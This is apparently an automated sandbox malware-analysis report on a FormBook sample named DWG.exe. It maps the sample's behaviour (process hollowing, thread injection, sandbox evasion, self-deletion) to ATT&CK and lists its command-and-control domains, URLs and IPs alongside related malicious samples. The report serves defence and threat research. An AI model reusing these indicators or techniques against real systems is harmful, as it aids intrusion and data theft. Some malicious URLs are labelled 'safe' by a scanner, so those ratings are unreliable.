          Source: Yara matchFile source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00411BFD VirtualProtect,glGenTextures,glBindTexture,glTexParameteri,glTexParameteri,glTexParameteri,glTexParameteri,glTexImage2D,glBindTexture,glBegin,glArrayElement,LineDDA,0_2_00411BFD

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion2Input Capture1System Time Discovery2Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemorySecurity Software Discovery121Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery14Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510733 Sample: DWG.exe Startdate: 28/10/2021 Architecture: WINDOWS Score: 100 34 www.mylyk.net 2->34 36 mylyk.net 2->36 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 7 other signatures 2->46 11 DWG.exe 1 2->11         started        signatures3 process4 signatures5 56 Tries to detect virtualization through RDTSC time measurements 11->56 14 DWG.exe 11->14         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 28 www.jntycy.com 154.216.113.38, 49814, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 17->28 30 publiccoins.online 198.187.31.159, 49816, 80 NAMECHEAP-NETUS United States 17->30 32 7 other IPs or domains 17->32 38 System process connects to network (likely due to code injection or exploit) 17->38 21 svchost.exe 17->21         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 21->48 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DWG.exe50%VirustotalBrowse
          DWG.exe38%ReversingLabsWin32.Trojan.Zusy
          DWG.exe100%AviraHEUR/AGEN.1136968
          DWG.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.1.DWG.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.0.DWG.exe.400000.0.unpack100%AviraHEUR/AGEN.1136968Download File
          5.2.DWG.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          10.2.svchost.exe.900000.1.unpack100%AviraTR/Patched.GenDownload File
          0.1.DWG.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          5.0.DWG.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.DWG.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          10.2.svchost.exe.3c3796c.4.unpack100%AviraTR/Patched.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          mylyk.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.theravewizards.com/xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt0%Avira URL Cloudsafe
          http://www.jntycy.com/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE0%Avira URL Cloudsafe
          www.elsist.online/xzes/0%Avira URL Cloudsafe
          http://schemas.mi0%URL Reputationsafe
          http://www.publiccoins.online/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB0%Avira URL Cloudsafe
          http://www.thebrandstudiointernational.com/xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          mylyk.net
          		198.54.116.195
          		truetrueunknown
          parkingpage.namecheap.com
          		198.54.117.215
          		truefalse
            		high
            thebrandstudiointernational.com
            		5.157.87.204
            		truetrue
              		unknown
              publiccoins.online
              		198.187.31.159
              		truetrue
                		unknown
                www.jntycy.com
                		154.216.113.38
                		truetrue
                  		unknown
                  www.theravewizards.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.hcbg.online
                    		unknown
                    		unknowntrue
                      		unknown
                      www.knowsyourdream.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.thebrandstudiointernational.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.mylyk.net
                          		unknown
                          		unknowntrue
                            		unknown
                            www.publiccoins.online
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.theravewizards.com/xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAttrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jntycy.com/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CEtrue
                              • Avira URL Cloud: safe
                              		unknown
                              www.elsist.online/xzes/true
                              • Avira URL Cloud: safe
                              		low
                              http://www.publiccoins.online/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaBtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.thebrandstudiointernational.com/xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAttrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://zz.bdstatic.com/linksubmit/push.jssvchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmpfalse
                                		high
                                https://www.yourhosting.nl/parkeerpagina.htmlsvchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmpfalse
                                  		high
                                  http://schemas.miexplorer.exe, 00000006.00000000.367204188.000000000EEB1000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://push.zhanzhang.baidu.com/push.jssvchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmpfalse
                                    		high

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    198.187.31.159
                                    		publiccoins.onlineUnited States
                                    		22612NAMECHEAP-NETUStrue
                                    154.216.113.38
                                    		www.jntycy.comSeychelles
                                    		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                    198.54.117.215
                                    		parkingpage.namecheap.comUnited States
                                    		22612NAMECHEAP-NETUSfalse
                                    5.157.87.204
                                    		thebrandstudiointernational.comNetherlands
                                    		48635ASTRALUSNLtrue

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:510733
                                    Start date:28.10.2021
                                    Start time:07:38:11
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 29s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:DWG.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:23
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@7/0@10/4
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 65% (good quality ratio 59.6%)
                                    • Quality average: 72.1%
                                    • Quality standard deviation: 31.3%
                                    HCA Information:
                                    • Successful, ratio: 85%
                                    • Number of executed functions: 102
                                    • Number of non-executed functions: 158
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 173.222.108.226, 173.222.108.210, 20.54.110.249, 40.112.88.60, 40.91.112.76, 80.67.82.211, 80.67.82.235
                                    • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    198.187.31.159DHL Shipment Notification 74683783.exeGet hashmaliciousBrowse
                                    • www.despachantemedeiros.digital/i6rd/?Y8=1bxX_L&k48hR8=oD4D3WBtzYo1qnPRU4xFACU8AEOn6ZKUJX42WoqGOohaqc1Klm4dkQagQXOcbxO0AuNj
                                    confirmation bancaire.xlsmGet hashmaliciousBrowse
                                    • abrakadamnasja.xyz/css/Jm.exe
                                    HSBC -- Wire Transfer copy.exeGet hashmaliciousBrowse
                                    • cameronznxbas.xyz/css/st.exe
                                    qkWaxZQ3dW.exeGet hashmaliciousBrowse
                                    • cameronznxbas.xyz/css/st.exe
                                    HPEE IMAGES-SPECIFICATION ORDER - Copy.xlsmGet hashmaliciousBrowse
                                    • cameronznxbas.xyz/css/st.exe
                                    198.54.117.215Payment Advice.exeGet hashmaliciousBrowse
                                    • www.swalayan.digital/i6rd/?5jQ=A6AdAx&W2MXD=93HbYkqhlgr3hIa7US827LxV1rVmh2fzufxww1YrXPJhXqBeF4zo1K/jxwKPrkIKYKuy
                                    payment advice0272110.exeGet hashmaliciousBrowse
                                    • www.lesbianrofsmo.xyz/anab/?CrQPabN=Hxy3RWVe69Cd7uohsVYEg0a3P3V/BArEGZWWXU9j8C4XG3zaWh17NoDyO0SzZtoKrMy6&_fQL6d=_Tb0RzfHQPihG
                                    Amended Order.xlsxGet hashmaliciousBrowse
                                    • www.usbgdt.com/upi8/?8p1ph=3UbDyqfm57lZRZ3h0rb1PNAqbmd7pBi1w5Vc7dibSIZzJ8oi4VLl/ITubhE1ReV/9McpbA==&gFQtn4=8pLLUjVPw6XD
                                    1.exeGet hashmaliciousBrowse
                                    • www.storiedpklnfo.xyz/cr35/?w0G=w6ATHTlpqz&Sj=R7uFhzm4gcxwYFTLKNpfOX8NH1TtMCM9jOrf3U7j71VMynR5kMeFj7P2GspnCIocjCkv
                                    F9ObnUc4ol.exeGet hashmaliciousBrowse
                                    • www.estudioamlegal.com/n58i/?V2JtX25=3sVI0/i2PyG3qUu4YTCUVrirDvoK3EI1NalLdVavy+6aj+oUnzTEerwQaaYisqIiJdwL&r0G4n8=4h-Li0
                                    QUOTATION.exeGet hashmaliciousBrowse
                                    • www.rjm226.com/d6pu/?y6Ah=E+oDRIxCy00LbbvBKWdFJBfE6OJ7C6i7pv3ziVqmlDcWx/nP77f/582lUnUjvWzaxdFqo3fvtw==&SD=Kn0PFhqhflm8
                                    TDCKZy88Av.exeGet hashmaliciousBrowse
                                    • www.narbaal.com/ef6c/?Y8hHaDY=Qfq1eVj3wcFFxzqVC6TNcABTYUkfKUx3lNvhXn0osFv9kGeC07OvFWGBvl2Js1jTOwhE&cTql2=VN6dXjmhbR4LNtZ
                                    Un81iJoK7J.exeGet hashmaliciousBrowse
                                    • www.growthabove.com/mexq/?1buhg=bdD4kHkGAKKARS2/MEaB/x1q3EjiCm0+FjMgd+v9P+tpp1aX/jd81LI1hNYmT9g5/78j&k6p=eN6tpho
                                    Cs3PcPy48f.msiGet hashmaliciousBrowse
                                    • www.dentureslenexa.com/fs3g/?2duD_V=5jLpSh&Nr=EvxTxkBKE/8KN4lE/0q+ZfOvMRN8EAws2Pchhx6z9xfjDddqEbBmmgVms/hUQamvUHB1
                                    KYTransactionServer.exeGet hashmaliciousBrowse
                                    • www.shtfinc.net/c8te/?_v3DpJ=4hoXJ0DHn0Nl5f&Hr=c4KXaeS6FUIM9Kkw5zq+LKxJtHGo+puYIzc+2WNcthS4RqO94x3yQg9DX6qTkjFSnzqd
                                    MIN8gr0eOj.exeGet hashmaliciousBrowse
                                    • www.diemcoin.one/pusp/?l0G=g0DTGJ5xhz3djJ&nnf=T0TgMD+6mn0DuMBmOzP3zXvuOjkt3/ENl7Tx/oMm/vomXqjYGAstOhThgpdXe/7E0j19
                                    NEW ORDER INQUIRY_Q091421.PDF.exeGet hashmaliciousBrowse
                                    • www.shuterestock.com/h5jc/?8pW=sHmAg5sqI9KQ6giaeL488tnzzkTJjyzeNMirB4cW9uUfC9OAP0nw0RzKpDngt1/tFv6F&1bE8p=8p04q8mHnH
                                    p83BktbXwe.exeGet hashmaliciousBrowse
                                    • www.narbaal.com/ef6c/?YFQLD6=Qfq1eVj3wcFFxzqVC6TNcABTYUkfKUx3lNvhXn0osFv9kGeC07OvFWGBvmagv1frHTUSCXVL+Q==&TN6=m6pTon
                                    RFQ453266433,pdf.exeGet hashmaliciousBrowse
                                    • www.socw.quest/dhua/?3ffh2ZO=XFJc1d+jHKZ2Ha3XF2pE/YK3hsm0H6SvQpEs8n+iI9sUFAN8uD9sSzhfglXAjmxyVYQA&UL=7nl0dra
                                    INVOICE.exeGet hashmaliciousBrowse
                                    • www.cockevodka.com/avqp/?LVl4iT=JN6HZxgh3h&nVw=j6FgMNUKQV6/m21MJvb0Ahqoc0m5WXE/0aHxV1wTX7IDWaC9PVxVO6/rPmm34gnoEjQs
                                    qFghuPTDuw.exeGet hashmaliciousBrowse
                                    • www.theadamcook.com/heth/?j48D=mDHPtfePwBFdPz&ZL3DB4=NDMUETaAEYpdEScjys5sfqa6oGQbzTI6bu3Tns5CefClzmXnigQog1+lgVVQ3ZRuGxjS/TCtDg==
                                    RFQ9003930 New Order.docGet hashmaliciousBrowse
                                    • www.ceasa.club/hht8/?3f_l=DUjZaEEJGHk2mIYyRTWCDvfPYGXyJA+p9CnlV/1lDuzycvHeDg3jgt8DWF0RM29KScOphA==&e6-0=cZQH7dS
                                    DHL_Sender_Documents_Details_021230900.xlsxGet hashmaliciousBrowse
                                    • www.why5mkt.com/m0np/?yPYP=KzrHnBoXSh&rN=pd8cLhyOD3Lvxu11EJvjnZnH7gmMmwGj/LLxrvXSZ/i0D2RlpnhF/0V5Vat1PcQ79Dzd8Q==
                                    85fX3YfW9S.exeGet hashmaliciousBrowse
                                    • www.roamingtrysha.com/hosg/?jBZ=1hNtiMcbd7AV+Zxw6jfXRht5026Vx3qKPd04RWegYVvuIjBVGyS0SVYMe04Jcmf/ypJkLnFPJw==&7n3=NFNTfdm8IF
                                    sprogr.exeGet hashmaliciousBrowse
                                    • www.kingofearth.love/myec/?LN689n=gh_TCpB&TBZh=7FWPYjaftzZ9H+gOW7161VQo7iIc+pdumeJhNdLHyulg3WNK/ncUHy14UGVnTYt1iuwi

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    parkingpage.namecheap.comBetalingskvittering.exeGet hashmaliciousBrowse
                                    • 198.54.117.217
                                    Payment Advice.exeGet hashmaliciousBrowse
                                    • 198.54.117.215
                                    payment advice0272110.exeGet hashmaliciousBrowse
                                    • 198.54.117.215
                                    DHL.exeGet hashmaliciousBrowse
                                    • 198.54.117.212
                                    Order of CB-15GL PO530_pdf.exeGet hashmaliciousBrowse
                                    • 198.54.117.212
                                    RFQ_PI02102110.exeGet hashmaliciousBrowse
                                    • 198.54.117.216
                                    cNOilTxTR3.exeGet hashmaliciousBrowse
                                    • 198.54.117.218
                                    lCFjxhAqu3.exeGet hashmaliciousBrowse
                                    • 198.54.117.212
                                    Amended Order.xlsxGet hashmaliciousBrowse
                                    • 198.54.117.215
                                    OS-QTN-0320-21-Rev1.exeGet hashmaliciousBrowse
                                    • 198.54.117.210
                                    1.exeGet hashmaliciousBrowse
                                    • 198.54.117.215
                                    DRAFT CONTRACT 0000499000-1100928777-pdf.exeGet hashmaliciousBrowse
                                    • 198.54.117.211
                                    U8NUCQkg3s.exeGet hashmaliciousBrowse
                                    • 198.54.117.218
                                    #U041a#U0430#U0441#U043e#U0432#U0430 #U0431#U0435#U043b#U0435#U0436#U043a#U0430.exeGet hashmaliciousBrowse
                                    • 198.54.117.216
                                    triage_dropped_file.exeGet hashmaliciousBrowse
                                    • 198.54.117.212
                                    2500010PO.excel.exeGet hashmaliciousBrowse
                                    • 198.54.117.216
                                    MAERSK LINE SHIPPING DOCUMENT_pdf.exeGet hashmaliciousBrowse
                                    • 198.54.117.212
                                    triage_dropped_file.exeGet hashmaliciousBrowse
                                    • 198.54.117.212
                                    F9ObnUc4ol.exeGet hashmaliciousBrowse
                                    • 198.54.117.211
                                    notification@dhl.com,pdf.exeGet hashmaliciousBrowse
                                    • 198.54.117.217

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    NAMECHEAP-NETUSPROFORMA INVOICE.exeGet hashmaliciousBrowse
                                    • 199.188.205.66
                                    MT103-Advance.Payment.exeGet hashmaliciousBrowse
                                    • 198.54.122.60
                                    Betalingskvittering.exeGet hashmaliciousBrowse
                                    • 198.54.117.217
                                    10272021-AM65Application.HTMGet hashmaliciousBrowse
                                    • 104.219.248.99
                                    Payment Advice.exeGet hashmaliciousBrowse
                                    • 198.54.117.215
                                    Tfwyelel3H.exeGet hashmaliciousBrowse
                                    • 192.64.119.254
                                    QQIksbWrVl.exeGet hashmaliciousBrowse
                                    • 63.250.40.204
                                    SKGCM_YAHYA AZHEBS#U0130 Ponuda proizvoda7.exeGet hashmaliciousBrowse
                                    • 198.54.126.156
                                    DUT2Aj4C2x.exeGet hashmaliciousBrowse
                                    • 185.61.153.108
                                    Swift Payment Notification.xlsxGet hashmaliciousBrowse
                                    • 63.250.40.204
                                    MT103USD.xlsxGet hashmaliciousBrowse
                                    • 63.250.40.204
                                    DHL_document11022020680908911.exeGet hashmaliciousBrowse
                                    • 198.54.114.114
                                    payment advice0272110.exeGet hashmaliciousBrowse
                                    • 198.54.117.215
                                    R0ptlo2GB2.exeGet hashmaliciousBrowse
                                    • 63.250.40.204
                                    QRT#U00a0(20211027#00001)#U00a0ACSAM-6000RC Quote.exeGet hashmaliciousBrowse
                                    • 63.250.40.204
                                    Order.exeGet hashmaliciousBrowse
                                    • 192.64.119.74
                                    PNkEr1lc2k.exeGet hashmaliciousBrowse
                                    • 63.250.40.204
                                    Enquiry docs_001.exeGet hashmaliciousBrowse
                                    • 63.250.40.204
                                    PO 211027-031A.exeGet hashmaliciousBrowse
                                    • 63.250.40.204
                                    PO_SBK4128332S.exeGet hashmaliciousBrowse
                                    • 198.54.114.114
                                    POWERLINE-AS-APPOWERLINEDATACENTERHKdhl.exeGet hashmaliciousBrowse
                                    • 156.242.205.175
                                    Order Requiremnt-Oct-2021.exeGet hashmaliciousBrowse
                                    • 154.215.87.120
                                    2500010PO.excel.exeGet hashmaliciousBrowse
                                    • 154.215.95.146
                                    apep.armGet hashmaliciousBrowse
                                    • 154.216.35.210
                                    yOtRXukeq9Get hashmaliciousBrowse
                                    • 154.203.73.148
                                    Shipping_Doc190dk0lwt837.exeGet hashmaliciousBrowse
                                    • 154.216.110.154
                                    Order 0091.exeGet hashmaliciousBrowse
                                    • 154.201.193.247
                                    fzkfNBkz1CGet hashmaliciousBrowse
                                    • 154.93.111.235
                                    FWsCarsq8QGet hashmaliciousBrowse
                                    • 156.242.206.33
                                    buiodawbdawbuiopdw.x86Get hashmaliciousBrowse
                                    • 156.244.139.182
                                    x86Get hashmaliciousBrowse
                                    • 156.242.206.59
                                    7qvn4qlmi3Get hashmaliciousBrowse
                                    • 156.251.7.162
                                    GRPVtMlbK5Get hashmaliciousBrowse
                                    • 156.242.206.39
                                    AWB##29721.PDF.exeGet hashmaliciousBrowse
                                    • 156.242.202.179
                                    UNNEIaOxVMGet hashmaliciousBrowse
                                    • 160.124.155.159
                                    arm7.lightGet hashmaliciousBrowse
                                    • 156.242.206.27
                                    UniRHdW5VCGet hashmaliciousBrowse
                                    • 156.251.7.176
                                    KEgx4lC3NiGet hashmaliciousBrowse
                                    • 156.243.251.0
                                    x86Get hashmaliciousBrowse
                                    • 156.244.234.124
                                    x86Get hashmaliciousBrowse
                                    • 156.244.234.124

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.157238812032227
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:DWG.exe
                                    File size:626688
                                    MD5:ff882802d113ed02fa070c496f89d797
                                    SHA1:aad1eed1c53f1d33ab52e13442b036bfeee91f1b
                                    SHA256:4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096
                                    SHA512:9785432a34fdb1132ddd8185fa2fdfae4db726be0bc14995a67520f10ad3fab4f2ce9c3a311c6e3c5163b3bde67942af6e4c75216914577eb3e47a17bb102512
                                    SSDEEP:12288:N7MTwrEg4nkEo2sH2yefktZkgHAyRsrGGFJr23+sejpAmiL:lMTwrEgskEorogHA0slrsfejc
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qE^$5$0w5$0w5$0wN8<w4$0wc;#w.$0w5$0w.$0w.8>w.$0w.;:w.$0w5$1w.%0wW;#w $0w."6w4$0w.;;wj$0wRich5$0w........................PE..L..

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x4367cb
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x5846A1B8 [Tue Dec 6 11:32:08 2016 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:c4824f327856ec0705e7797356a7405e

                                    Entrypoint Preview

                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    push FFFFFFFFh
                                    push 00460F30h
                                    push 0043B828h
                                    mov eax, dword ptr fs:[00000000h]
                                    push eax
                                    mov dword ptr fs:[00000000h], esp
                                    sub esp, 58h
                                    push ebx
                                    push esi
                                    push edi
                                    mov dword ptr [ebp-18h], esp
                                    call dword ptr [004511ACh]
                                    xor edx, edx
                                    mov dl, ah
                                    mov dword ptr [00471604h], edx
                                    mov ecx, eax
                                    and ecx, 000000FFh
                                    mov dword ptr [00471600h], ecx
                                    shl ecx, 08h
                                    add ecx, edx
                                    mov dword ptr [004715FCh], ecx
                                    shr eax, 10h
                                    mov dword ptr [004715F8h], eax
                                    push 00000001h
                                    call 00007FC6445A8F68h
                                    pop ecx
                                    test eax, eax
                                    jne 00007FC6445A678Ah
                                    push 0000001Ch
                                    call 00007FC6445A6848h
                                    pop ecx
                                    call 00007FC6445A84B6h
                                    test eax, eax
                                    jne 00007FC6445A678Ah
